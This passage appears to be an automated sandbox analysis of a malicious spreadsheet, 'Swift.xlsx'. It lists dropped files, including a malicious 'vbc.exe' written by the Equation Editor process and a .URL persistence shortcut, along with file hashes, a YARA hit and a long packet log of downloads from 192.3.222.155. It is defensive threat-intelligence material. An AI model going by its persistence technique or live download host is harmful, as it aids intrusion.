SHA-512:	991F4A6639148929BFE6EDBD804C40A28A9166DB47D9959D4494D9DF963C8752A0E0D415341B078B7B2ECB721F3DD0D7E1AB251DF55106C9D2E6B678B116208E
Malicious:	false
Yara Hits:	Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\hpvdsxZ.url, Author: @itsreallynick (Nick Carr)
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Zxsdvph\\Zxsdvph.exe"..IconIndex=2..

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1014784
Entropy (8bit):	6.809458920712055
Encrypted:	false
SSDEEP:	12288:GrHeuodar6Dd3m4aS9FCZXhGiX1d0uVrLGaDOdJ4NUTj94rv4lprmi:GDe0W1m4aVNTc9jOij2rqpm
MD5:	A65B1815177EF9EBA7E5E894BBF65A3C
SHA1:	5459ECF044E62BFB53220D0E78A5B98C24F17E25
SHA-256:	298D542746DFA4922DD5FBC8FAB572BE58447C9DBD1481C55BD2254BB275684F
SHA-512:	0F05D5E05D51FBE5289330CA2C5486C49369728005C6D19B548D3F419FBF52F25AA50007271B315636AEDB311A43485989E4F6DE8154869D0AC7AFFB0F0E3DB1
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,.............@..............................................@..............................`'........................... ......................................................................................CODE................................ ..`DATA....d...........................@...BSS......................................idata..`'.......(..................@....tls....@................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................\|..............@..P........................................................................................................................................

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.972337446998264
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	Swift.xlsx
File size:	341944
MD5:	9a43d5d2ffc56e823280ca84f6bb870f
SHA1:	f0945075b44bc2cb2c96b168d47a269eb0d714ce
SHA256:	88c07a30074065b292335ae5d4a45f905fa8a6739d3031d2f8236d2d9a27c681
SHA512:	b46f3e608f57ae5156336355f0c7bf90ab655f3db16a0318ee0ac6b16e01ee8b5ed4eab78e3662093f9b3d2cae0bbdc9811367b3bb1ccf39098abe731ff2dd67
SSDEEP:	6144:1+24gh/BSPohIzJutURE/sI/j16YhtJHUf8HslNtrF5HyY8d:1+24gh/Chk1BlUf8ctrFYxd
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2021 17:05:25.061503887 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.235030890 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.235114098 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.235505104 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.411304951 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.411339045 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.411360979 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.411381960 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.411465883 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.411509991 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.584945917 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.584981918 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.585006952 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.585028887 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.585056067 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.585078001 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.585099936 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.585124016 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.585215092 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.585282087 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.758759975 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.758830070 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.758867979 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.758907080 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.758944988 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.758985996 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.758991957 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.759049892 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.759051085 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.759076118 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.759094000 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.759104967 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.759165049 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.759186983 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.759239912 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.759267092 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.759282112 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.759303093 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.759319067 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.759330034 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.759357929 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.759361982 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.759394884 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.759407997 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.759433031 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.759438038 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.759469032 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.761244059 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.932890892 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.932924032 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.932945967 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.932962894 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.932967901 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.932986975 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.932991982 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.932996988 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.933018923 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.933026075 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.933043003 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.933048010 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.933064938 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.933068991 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.933088064 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.933096886 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.933111906 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.933132887 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.933146954 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.933151007 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.933166027 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.933175087 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.933191061 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.933197975 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.933221102 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.933242083 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.933244944 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.933249950 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.933264971 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.933270931 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.933286905 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.933296919 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.933314085 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.933337927 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.933339119 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.933357000 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.933360100 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.933376074 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.933382034 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.933397055 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.933406115 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.933417082 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.933428049 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.933439016 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.933450937 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.933469057 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.933473110 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.933490038 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.933500051 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.933520079 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.933523893 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.933546066 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.933556080 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.933568001 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:25.933646917 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.933672905 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.933676958 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:25.934534073 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.107012987 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.107068062 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.107137918 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.107196093 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.107213020 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.107243061 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.107279062 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.107280016 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.107327938 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.107328892 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.107372999 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.107378960 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.107419014 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.107419968 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.107469082 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.107470989 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.107518911 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.107523918 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.107573032 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.107574940 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.107615948 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.107620955 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.107652903 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.107667923 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.107688904 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.107692957 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.107722044 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.107734919 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.107757092 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.107759953 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.107791901 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.107809067 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.107831955 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.107835054 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.107877016 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.107888937 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.107912064 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.107929945 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.107947111 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.107958078 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.107983112 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.107996941 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.108016968 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.108019114 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.108052015 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.108062983 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.108087063 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.108103037 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.108128071 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.108130932 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.108170033 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.108182907 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.108203888 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.108218908 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.108239889 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.108251095 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.108275890 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.108288050 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.108309984 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.108310938 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.108344078 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.108355999 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.108378887 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.108383894 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.108422041 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.108426094 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.108459949 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.108470917 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.108494043 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.108509064 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.108530045 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.108532906 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.108563900 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.108573914 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.108598948 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.108603001 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.108633995 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.108664036 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.108668089 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.108684063 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.108710051 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.108711958 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.108751059 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.108766079 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.108784914 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.108791113 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.108819962 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.108836889 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.108863115 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.108877897 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.108896971 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.108902931 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.108932972 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.108942986 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.108982086 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.109452963 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.282349110 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.282440901 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.282490969 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.282557964 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.282630920 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.282669067 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.282708883 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.282747030 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.282847881 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.282910109 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.282917976 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.282922983 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.282927990 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.282932997 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.283298016 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.283349991 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.283394098 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.283412933 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.283432007 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.283456087 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.283472061 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.283504009 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.283510923 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.283525944 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.283549070 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.283565044 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.283586979 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.283601046 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.283626080 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.283646107 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.283674002 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.283679962 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.283716917 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.283751965 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.283771992 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.283775091 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.283812046 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.283830881 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.283850908 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.283890009 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.283905029 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.283929110 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.283952951 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.283966064 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.283981085 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.284013033 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.284058094 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.284105062 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.284117937 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.284143925 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.284179926 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.284231901 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.284269094 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.284282923 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.284331083 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.284348965 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.284349918 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.284400940 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.284414053 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.284440994 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.284461021 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.284480095 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.284502983 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.284528971 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.284544945 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.284574032 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.284598112 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.284614086 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.284653902 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.284683943 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.284730911 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.284739971 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.284776926 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.284780025 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.284810066 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.284816027 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.284816980 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.284854889 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.284857035 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.284899950 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.284902096 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.284970999 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.284976006 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.285012960 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.285015106 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.285048962 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.285053968 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.285093069 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.285105944 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.285111904 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.285187960 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.286315918 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.456268072 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.456335068 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.456373930 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.456418991 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.456458092 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.456506968 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.456552029 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.456598997 CEST	80	49167	192.3.222.155	192.168.2.22
